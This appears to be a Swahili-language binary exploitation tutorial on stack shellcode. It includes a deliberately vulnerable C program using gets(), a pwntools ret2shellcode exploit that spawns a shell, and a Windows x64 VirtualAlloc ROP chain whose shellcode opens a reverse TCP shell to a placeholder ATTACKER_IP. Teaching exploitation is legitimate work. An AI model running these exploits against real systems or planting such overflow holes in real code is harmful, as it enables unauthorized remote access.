Stack Shellcode

Reading time: 8 minutes

Taarifa za Msingi

Stack shellcode ni mbinu inayotumika katika binary exploitation ambapo mshambuliaji anaandika shellcode kwenye stack ya programu yenye udhaifu na kisha hubadilisha Instruction Pointer (IP) au Extended Instruction Pointer (EIP) ili kuonyesha eneo la shellcode hiyo, na kusababisha itekelezwe. Hii ni mbinu ya kawaida inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zozote kwenye mfumo lengwa. Hapa kuna muhtasari wa mchakato, ikijumuisha mfano rahisi wa C na jinsi unaweza kuandika exploit inayolingana ukitumia Python na pwntools.

Mfano wa C: Programu yenye udhaifu

Hebu tuanze na mfano rahisi wa programu ya C yenye udhaifu:

#include <stdio.h>
#include <string.h>

void vulnerable_function() {
char buffer[64];
gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
vulnerable_function();
printf("Returned safely\n");
return 0;
}

Programu hii ni nyeti kwa buffer overflow kutokana na matumizi ya kazi ya gets().

Kujenga

Ili kujenga programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo:

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c

• -fno-stack-protector: Inazima ulinzi wa stack.
• -z execstack: Hufanya stack iwe executable, jambo muhimu ili kutekeleza shellcode iliyohifadhiwa kwenye stack.
• -no-pie: Inazima Position Independent Executable (PIE), ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa.
• -m32: Inatengeneza programu kama executable ya 32-bit, mara nyingi hutumika kwa urahisi katika exploit development.

Python Exploit using Pwntools

Hapa ni jinsi unavyoweza kuandika exploit kwa Python ukitumia pwntools ili kufanya ret2shellcode attack:

from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()

This script inaunda payload inayojumuisha NOP slide, the shellcode, na kisha inaandika tena EIP na anwani inayorejelea NOP slide, kuhakikisha shellcode inatekelezwa.

The NOP slide (asm('nop')) inatumiwa kuongeza nafasi kwamba utekelezaji "utalizuka" ndani ya shellcode yetu bila kujali anwani kamili. Badilisha hoja ya p32() kwenda anwani ya kuanzia ya buffer yako pamoja na offset ili kumaliza kwenye NOP slide.

Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode)

Kwenye Windows ya kisasa stack haitekelezwi (DEP/NX). Njia ya kawaida ya kuendesha stack-resident shellcode baada ya stack BOF ni kujenga mnyororo wa 64-bit ROP unaoitisha VirtualAlloc (au VirtualProtect) kutoka module Import Address Table (IAT) ili kufanya eneo la stack liwe executable na kisha kurudi ndani ya shellcode iliyoongezwa baada ya chain.

Key points (Win64 calling convention):

• VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
• RCX = lpAddress → chagua anwani kwenye stack ya sasa (mf., RSP) ili eneo jipya la RWX lipatekusanyika na payload yako
• RDX = dwSize → kubwa vya kutosha kwa chain + shellcode (mf., 0x1000)
• R8 = flAllocationType = MEM_COMMIT (0x1000)
• R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40)
• Return directly into the shellcode placed right after the chain.

Minimal strategy:

1. Leak a module base (mf., via a format-string, object pointer, etc.) ili kuhesabu anwani kamili za gadget na IAT chini ya ASLR.
2. Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) na call/jmp [VirtualAlloc@IAT]. Ikiwa huna direct pop r8/r9, tumia arithmetic gadgets kutengeneza constants (mf., weka r8=0 kisha kuongeza r9=0x40 mara nyingi hadi kufikia 0x1000).
3. Place stage-2 shellcode immediately after the chain.

Example layout (conceptual):

# ... padding up to saved RIP ...
# R9 = 0x40 (PAGE_EXECUTE_READWRITE)
POP_R9_RET; 0x40
# R8 = 0x1000 (MEM_COMMIT) — if no POP R8, derive via arithmetic
POP_R8_RET; 0x1000
# RCX = &stack (lpAddress)
LEA_RCX_RSP_RET    # or sequence: load RSP into a GPR then mov rcx, reg
# RDX = size (dwSize)
POP_RDX_RET; 0x1000
# Call VirtualAlloc via the IAT
[IAT_VirtualAlloc]
# New RWX memory at RCX — execution continues at the next stack qword
JMP_SHELLCODE_OR_RET
# ---- stage-2 shellcode (x64) ----

Kwa gadget set iliyo na vikwazo, unaweza kutengeneza thamani za rejista kwa njia isiyo ya moja kwa moja, kwa mfano:

• mov r9, rbx; mov r8, 0; add rsp, 8; ret → weka r9 kutoka rbx, weka r8 kwa sifuri, na fidia stack kwa junk qword.
• xor rbx, rsp; ret → kuanzisha rbx kwa stack pointer ya sasa.
• push rbx; pop rax; mov rcx, rax; ret → hamisha thamani inayotokana na RSP ndani ya RCX.

Pwntools rasimu (ikiwa base na gadgets vinajulikana):

from pwn import *
base = 0x7ff6693b0000
IAT_VirtualAlloc = base + 0x400000  # example: resolve via reversing
rop  = b''
# r9 = 0x40
rop += p64(base+POP_RBX_RET) + p64(0x40)
rop += p64(base+MOV_R9_RBX_ZERO_R8_ADD_RSP_8_RET) + b'JUNKJUNK'
# rcx = rsp
rop += p64(base+POP_RBX_RET) + p64(0)
rop += p64(base+XOR_RBX_RSP_RET)
rop += p64(base+PUSH_RBX_POP_RAX_RET)
rop += p64(base+MOV_RCX_RAX_RET)
# r8 = 0x1000 via arithmetic if no pop r8
for _ in range(0x1000//0x40):
rop += p64(base+ADD_R8_R9_ADD_RAX_R8_RET)
# rdx = 0x1000 (use any available gadget)
rop += p64(base+POP_RDX_RET) + p64(0x1000)
# call VirtualAlloc and land in shellcode
rop += p64(IAT_VirtualAlloc)
rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT))

Vidokezo:

• VirtualProtect inafanya kazi kwa njia ile ile ikiwa kuifanya buffer iliyopo RX ni muhimu; mpangilio wa vigezo ni tofauti.

• Ikiwa nafasi ya stack ni nyembamba, tengeneza RWX mahali pengine (RCX=NULL) na jmp kwa eneo jipya badala ya kutumia tena stack.

• Kumbuka daima gadgets ambazo zinabadilisha RSP (e.g., add rsp, 8; ret) kwa kuingiza junk qwords.

• ASLR should be disabled ili anwani iwe thabiti katika utekelezaji mbalimbali, vinginevyo anwani ambapo function itahifadhiwa haitakuwa daima sawa na utakahitaji leak ili kubaini wapi win function imepakuliwa.

• Stack Canaries pia zinapaswa kuzimwa, vinginevyo anuani ya EIP iliyoharibika haitafuatiwa kamwe.

• NX stack protection ingekuwa ikizuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitaweza kutekelezeka.

Mifano Mengine & Marejeo

• https://ir0nstone.gitbook.io/notes/types/stack/shellcode
• https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html
• 64bit, ASLR na stack address leak, andika shellcode na ruka kwenda kwake
• https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html
• 32 bit, ASLR na stack leak, andika shellcode na ruka kwenda kwake
• https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html
• 32 bit, ASLR na stack leak, kulinganisha ili kuzuia mwito wa exit(), andika juu variable kwa thamani na andika shellcode kisha ruka kwenda kwake
• https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/
• arm64, hakuna ASLR, ROP gadget kufanya stack iwe executable na ruka kwenda shellcode ndani ya stack

Marejeo

• HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)
• VirtualAlloc documentation